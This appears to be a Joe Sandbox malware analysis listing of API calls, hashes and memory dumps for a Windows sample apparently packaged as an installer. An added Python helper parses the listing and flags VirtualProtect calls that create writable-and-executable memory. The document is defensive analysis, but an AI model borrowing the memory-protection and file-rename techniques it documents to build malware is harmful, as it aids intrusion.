                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                   • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                   • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
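The VirtualProtect entry above is the one API line in this listing whose arguments are worth decoding by hand: the third argument, 00000040, is PAGE_EXECUTE_READWRITE, applied to a 4-byte range at 1000405C inside the module mapped at 10000000. The listing alone does not say what is written there afterwards, only that a small region of that module is made writable and executable at once. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses "APIs" entries in the exact textual form they take on this page (including the "Part of subcall function" prefix and the parenthesis-less wsprintfW form), converts 8-hex-digit arguments to integers, decodes VirtualProtect's flNewProtect against the winnt.h PAGE_* constants, and flags any call that grants both write and execute. The sample lines are copied from this section; the regular expression assumes the report's rendering shown here and would need adjusting for other exports.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# winnt.h memory-protection constants (flNewProtect of VirtualProtect).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}

# One "APIs" bullet as rendered in this Joe Sandbox listing (assumed format):
#   • [Part of subcall function ADDR: ]Name.Module[(arg,arg,...)][,] ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*"
    r"(?:ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[object] = field(default_factory=list)  # int, None for '?', or str
    ref: Optional[str] = None
    subcall_of: Optional[str] = None


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet; return None for lines that are not API entries."""
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[object] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            if tok == "?":
                args.append(None)            # sandbox could not resolve the value
            elif HEX32.fullmatch(tok):
                args.append(int(tok, 16))    # 32-bit immediate / pointer
            else:
                args.append(tok)             # resolved string, e.g. a file path
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub"))


def decode_protect(value: int) -> str:
    """Render a PAGE_* value as its symbolic name plus any modifier bits."""
    base = value & 0xFF
    names = [PAGE_PROTECT.get(base, f"0x{base:02X}")]
    names += [n for bit, n in PAGE_MODIFIERS.items() if value & bit]
    return " | ".join(names)


def is_rwx(value: int) -> bool:
    """True when the protection is writable and executable at the same time."""
    return (value & 0xFF) in (0x40, 0x80)


def triage(report_lines: List[str]) -> Tuple[List[ApiCall], List[str]]:
    """Parse all API bullets and report VirtualProtect calls that create RWX memory."""
    calls = [c for c in (parse_api_line(l) for l in report_lines) if c]
    findings = []
    for c in calls:
        if c.name != "VirtualProtect" or len(c.args) < 3:
            continue
        addr, size, prot = c.args[0], c.args[1], c.args[2]
        if all(isinstance(v, int) for v in (addr, size, prot)) and is_rwx(prot):
            findings.append(
                f"RWX at ref {c.ref}: VirtualProtect(0x{addr:08X}, {size} bytes, {decode_protect(prot)})"
            )
    return calls, findings


# Sample input: four API bullets copied from this section of the report.
SAMPLE = [
    "• Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C",
    "• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5",
    "• Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C",
    r"• GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8",
]

if __name__ == "__main__":
    parsed, hits = triage(SAMPLE)
    for call in parsed:
        print(call)
    for hit in hits:
        print(hit)
```

Run against the whole "APIs" export rather than these four lines to get every RWX transition in one pass; the `ref` address ties each finding back to the function block it came from, and `subcall_of` tells you whether the call sits in the function itself or in a callee the report attributed to it.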
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                  • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                  • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                  • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                  • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                  • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                  • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                  • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                  • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                  • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                  • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                  • DeleteObject.GDI32(00000000), ref: 00404C64
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                  • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004050EF
                                                  • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                  • ShowWindow.USER32(00000000), ref: 0040514F
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                  • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                  • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                    • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                    • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                  • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                  • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                  Strings
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                  • API String ID: 2246997448-1365839044
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                  • GetSysColor.USER32(?), ref: 00404417
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                  • lstrlenW.KERNEL32(?), ref: 00404438
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                  • SendMessageW.USER32(00000000), ref: 004044BA
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                  • SetCursor.USER32(00000000), ref: 00404539
                                                  • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                  • SetCursor.USER32(00000000), ref: 0040455D
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: Call$N$open
                                                  • API String ID: 3615053054-2563687911
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                  • wsprintfA.USER32 ref: 00405CDE
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                  • API String ID: 1265525490-899692902
                                                  • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                  • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                  • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                  • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                  • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                  • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                  • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                   • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                   • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID: @H3w
                                                  • API String ID: 4216380887-4275297014
                                                  • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                  • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                  • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                  • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                  • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                  Strings
                                                  Memory Dump Source
